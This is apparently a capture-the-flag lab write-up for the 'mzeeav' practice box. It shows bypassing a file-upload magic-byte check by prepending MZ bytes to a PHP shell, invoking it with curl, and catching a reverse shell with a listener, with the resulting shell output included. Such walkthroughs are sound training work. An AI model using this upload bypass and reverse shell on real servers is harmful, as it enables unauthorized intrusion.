InfoSec LAB

Arbitrary File Upload

A backup archive of the target web application was discovered, leaking the source code of the file upload functionality. The upload.php file renames file to file.tmp and uploads it to the upload directory, then it checks the file signature by checking the magicbytes of 4D5A, which is the DOS MZ executable and its descendants (including NE and PE)

Just need to append MZ to the beginning of the payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mzeeav]
└─$ hexeditor shell.php

Checking with the hexeditor shows the 4D5A, filling the requirement in the upload.php file

Successfully uploaded the payload and being redirected to the listing.php page

There it is. It should be accessible in the upload directory

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mzeeav]
└─$ curl -s http://$IP/upload/shell.php

Invoking the payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mzeeav]
└─$ nnc 9999      
listening on [any] 9999 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.190.33] 53752
SOCKET: Shell has connected! PID: 1174
whoami
www-data
hostname
mzeeav
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:81:fb brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.190.33/24 brd 192.168.190.255 scope global ens192
       valid_lft forever preferred_lft forever

Initial Foothold established to the target system as the www-data account via arbitrary file upload

InfoSec LAB

Explorer

MZEEAV_Exploitation

Arbitrary File Upload

Interactive Graph View

Backlinks